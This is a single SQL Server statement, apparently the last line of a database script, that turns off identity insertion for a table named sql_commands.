SET IDENTITY_INSERT [dbo].[sql_commands] OFF
